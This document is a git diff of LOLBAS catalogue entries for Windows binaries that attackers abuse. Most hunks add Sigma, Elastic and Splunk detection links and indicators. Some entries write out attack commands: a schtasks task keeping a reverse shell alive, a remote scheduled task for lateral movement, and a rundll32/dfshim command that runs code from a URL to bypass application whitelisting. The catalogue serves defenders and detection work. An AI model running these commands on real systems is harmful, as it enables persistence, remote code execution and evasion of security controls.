- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/sc_exe_manipulating_windows_services.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/lateral_movement_cmd_service.toml
|
||||||
|
- IOC: Unexpected service creation
|
||||||
|
- IOC: Unexpected service modification
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -6,18 +6,28 @@ Created: 2018-05-25
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
|
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
|
||||||
Description: Create a recurring task to execute every minute.
|
Description: Create a recurring task to execute every minute.
|
||||||
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
|
Usecase: Create a recurring task to keep reverse shell session(s) alive
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1053.005
|
MitreID: T1053.005
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
|
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
|
||||||
|
Description: Create a scheduled task on a remote computer for persistence/lateral movement
|
||||||
|
Usecase: Create a remote task to run daily relative to the the time of creation
|
||||||
|
Category: Execute
|
||||||
|
Privileges: Administrator
|
||||||
|
MitreID: T1053.005
|
||||||
|
OperatingSystem: Windows
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\schtasks.exe
|
- Path: c:\windows\system32\schtasks.exe
|
||||||
- Path: c:\windows\syswow64\schtasks.exe
|
- Path: c:\windows\syswow64\schtasks.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Services that gets created
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/59000b993d6280d9bf063eefdcdf30ea0e83aa5e/rules/windows/process_creation/win_susp_schtask_creation.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/persistence_local_scheduled_task_creation.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml
|
||||||
|
- IOC: Suspicious task creation events
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/
|
- Link: https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -24,6 +24,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/765acac3742310764495ed5a2006bc0ced5b1a67/rules/windows/process_creation/win_susp_servu_process_pattern.yml
|
||||||
- IOC: Scriptrunner.exe should not be in use unless App-v is deployed
|
- IOC: Scriptrunner.exe should not be in use unless App-v is deployed
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/KyleHanslovan/status/914800377580503040
|
- Link: https://twitter.com/KyleHanslovan/status/914800377580503040
|
||||||
|
@ -22,6 +22,7 @@ Full_Path:
|
|||||||
- Path: C:\Windows\System32\SettingSyncHost.exe
|
- Path: C:\Windows\System32\SettingSyncHost.exe
|
||||||
- Path: C:\Windows\SysWOW64\SettingSyncHost.exe
|
- Path: C:\Windows\SysWOW64\SettingSyncHost.exe
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_using_settingsynchost_as_lolbin.yml
|
||||||
- IOC: SettingSyncHost.exe should not be run on a normal workstation
|
- IOC: SettingSyncHost.exe should not be run on a normal workstation
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/
|
- Link: https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/
|
||||||
|
@ -15,6 +15,7 @@ Full_Path:
|
|||||||
- Path: c:\windows\system32\stordiag.exe
|
- Path: c:\windows\system32\stordiag.exe
|
||||||
- Path: c:\windows\syswow64\stordiag.exe
|
- Path: c:\windows\syswow64\stordiag.exe
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/8b86a79ef0ca2f32c006c327350b76b47b604690/rules/windows/process_creation/process_creation_stordiag_execution.yml
|
||||||
- IOC: systeminfo.exe, fltmc.exe or schtasks.exe being executed outside of their normal path of c:\windows\system32\ or c:\windows\syswow64\
|
- IOC: systeminfo.exe, fltmc.exe or schtasks.exe being executed outside of their normal path of c:\windows\system32\ or c:\windows\syswow64\
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/eral4m/status/1451112385041911809
|
- Link: https://twitter.com/eral4m/status/1451112385041911809
|
||||||
|
@ -17,6 +17,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/powershell_syncappvpublishingserver_exe.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/process_creation_syncappvpublishingserver_exe.yml
|
||||||
- IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed
|
- IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/monoxgas/status/895045566090010624
|
- Link: https://twitter.com/monoxgas/status/895045566090010624
|
||||||
|
@ -24,6 +24,9 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/5951ad1d9a781a49d61df9af03c7b83ac67a0012/rules/windows/image_load/process_creation_tttracer_mod_load.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/5951ad1d9a781a49d61df9af03c7b83ac67a0012/rules/windows/image_load/sysmon_tttracer_mod_load.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
|
||||||
- IOC: Parent child relationship. Tttracer parent for executed command
|
- IOC: Parent child relationship. Tttracer parent for executed command
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/oulusoyum/status/1191329746069655553
|
- Link: https://twitter.com/oulusoyum/status/1191329746069655553
|
||||||
|
@ -23,6 +23,9 @@ Full_Path:
|
|||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Lior Adar
|
- Person: Lior Adar
|
||||||
Handle:
|
Handle:
|
||||||
|
@ -17,7 +17,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_verclsid_runs_com.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/verclsid_clsid_execution.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
|
- Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
|
||||||
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
|
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
|
||||||
|
@ -17,6 +17,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/a80c29a7c2e2e500a1a532db2a2a8bd69bd4a63d/rules/windows/registry_event/sysmon_wab_dllpath_reg_change.yml
|
||||||
- IOC: WAB.exe should normally never be used
|
- IOC: WAB.exe should normally never be used
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/Hexacorn/status/991447379864932352
|
- Link: https://twitter.com/Hexacorn/status/991447379864932352
|
||||||
|
@ -66,7 +66,21 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Wmic getting scripts from remote system
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/8beb70e970b814d0ab60625206ea0d8a21a9bff8/rules/windows/image_load/sysmon_wmic_remote_xsl_scripting_dlls.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_xsl_script_processing.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_bypass_squiblytwo.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/c90e31275d2f98b21e55df8a46d0678cfca458d6/rules/windows/process_creation/win_susp_wmic_eventconsumer_create.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml
|
||||||
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
|
- IOC: Wmic retrieving scripts from remote system/Internet location
|
||||||
|
- IOC: DotNet CLR libraries loaded into wmic.exe
|
||||||
|
- IOC: DotNet CLR Usage Log - wmic.exe.log
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
|
- Link: https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
|
||||||
- Link: https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
|
- Link: https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
|
||||||
|
@ -14,6 +14,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\WorkFolders.exe
|
- Path: C:\Windows\System32\WorkFolders.exe
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_workfolders.yml
|
||||||
- IOC: WorkFolders.exe should not be run on a normal workstation
|
- IOC: WorkFolders.exe should not be run on a normal workstation
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://www.ctus.io/2021/04/12/exploading/
|
- Link: https://www.ctus.io/2021/04/12/exploading/
|
||||||
|
@ -24,7 +24,17 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/image_load/sysmon_susp_script_dotnet_clr_dll_load.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
|
||||||
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
- IOC: Wscript.exe executing code from alternate data streams
|
- IOC: Wscript.exe executing code from alternate data streams
|
||||||
|
- IOC: DotNet CLR libraries loaded into wscript.exe
|
||||||
|
- IOC: DotNet CLR Usage Log - wscript.exe.log
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -16,6 +16,11 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_wsreset_uac_bypass.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/af599e487728ec95eab96d8a980718aa6a0699e4/rules/windows/process_creation/win_uac_bypass_wsreset.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_wsreset.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/registry_event/sysmon_bypass_via_wsreset.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/wsreset_uac_bypass.yml
|
||||||
- IOC: wsreset.exe launching child process other than mmc.exe
|
- IOC: wsreset.exe launching child process other than mmc.exe
|
||||||
- IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command
|
- IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command
|
||||||
- IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen
|
- IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen
|
||||||
|
@ -16,7 +16,11 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/network_connection/sysmon_wuauclt_network_connection.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/f16aca7a353bb01d9862ea1f2a10fa0d866e83c3/rules/windows/process_creation/sysmon_proxy_execution_wuauclt.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/30bee7204cc1b98a47635ed8e52f44fdf776c602/rules/windows/process_creation/win_susp_wuauclt.yml
|
||||||
- IOC: wuauclt run with a parameter of a DLL path
|
- IOC: wuauclt run with a parameter of a DLL path
|
||||||
|
- IOC: Suspicious wuauclt Internet/network connections
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://dtm.uk/wuauclt/
|
- Link: https://dtm.uk/wuauclt/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
@ -31,7 +31,10 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_class_exec_xwizard.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/8909eefb90c799fb642f6d9d0d6ee6d855a6a654/rules/windows/process_creation/win_dll_sideload_xwizard.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/execution_com_object_xwizard.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
|
- Link: http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
|
||||||
- Link: https://www.youtube.com/watch?v=LwDHX7DVHWU
|
- Link: https://www.youtube.com/watch?v=LwDHX7DVHWU
|
||||||
|
@ -46,7 +46,8 @@ Code_Sample:
|
|||||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf
|
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack.inf
|
||||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct
|
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Advpack_calc.sct
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
|
- Link: https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
|
||||||
- Link: https://twitter.com/ItsReallyNick/status/967859147977850880
|
- Link: https://twitter.com/ItsReallyNick/status/967859147977850880
|
||||||
|
29
yml/OSLibraries/Dfshim.yml
Normal file
29
yml/OSLibraries/Dfshim.yml
Normal file
@ -0,0 +1,29 @@
|
|||||||
|
---
|
||||||
|
Name: Dfshim.dll
|
||||||
|
Description: ClickOnce engine in Windows used by .NET
|
||||||
|
Author: 'Oddvar Moe'
|
||||||
|
Created: 2018-05-25
|
||||||
|
Commands:
|
||||||
|
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||||
|
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
|
||||||
|
Usecase: Use binary to bypass Application whitelisting
|
||||||
|
Category: AWL bypass
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1127
|
||||||
|
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
|
||||||
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
||||||
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
||||||
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
|
Resources:
|
||||||
|
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||||
|
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Casey Smith
|
||||||
|
Handle: '@subtee'
|
||||||
|
---
|
@ -44,7 +44,8 @@ Code_Sample:
|
|||||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf
|
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack.inf
|
||||||
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct
|
- Code: https://github.com/LOLBAS-Project/LOLBAS-Project.github.io/blob/master/_lolbas/Libraries/Payload/Ieadvpack_calc.sct
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
|
- Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
|
||||||
- Link: https://twitter.com/pabraeken/status/991695411902599168
|
- Link: https://twitter.com/pabraeken/status/991695411902599168
|
||||||
|
@ -17,7 +17,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
|
- Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
|
- Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
|
||||||
- Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
- Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
||||||
|
@ -17,7 +17,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/pabraeken/status/998567549670477824
|
- Link: https://twitter.com/pabraeken/status/998567549670477824
|
||||||
- Link: https://windows10dll.nirsoft.net/mshtml_dll.html
|
- Link: https://windows10dll.nirsoft.net/mshtml_dll.html
|
||||||
|
@ -17,7 +17,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Analysis: https://redcanary.com/threat-detection-report/techniques/rundll32/
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/harr0ey/status/989617817849876488
|
- Link: https://twitter.com/harr0ey/status/989617817849876488
|
||||||
- Link: https://windows10dll.nirsoft.net/pcwutl_dll.html
|
- Link: https://windows10dll.nirsoft.net/pcwutl_dll.html
|
||||||
|
@ -27,7 +27,9 @@ Code_Sample:
|
|||||||
- Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct
|
- Code: https://gist.githubusercontent.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba/raw/6cb52b88bcc929f5555cd302d9ed848b7e407052/Backdoor-Minimalist.sct
|
||||||
- Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf
|
- Code: https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_setupapi_installhinfsection.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://github.com/huntresslabs/evading-autoruns
|
- Link: https://github.com/huntresslabs/evading-autoruns
|
||||||
- Link: https://twitter.com/pabraeken/status/994742106852941825
|
- Link: https://twitter.com/pabraeken/status/994742106852941825
|
||||||
|
@ -17,7 +17,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
|
- Code: https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
|
- Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
|
||||||
- Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
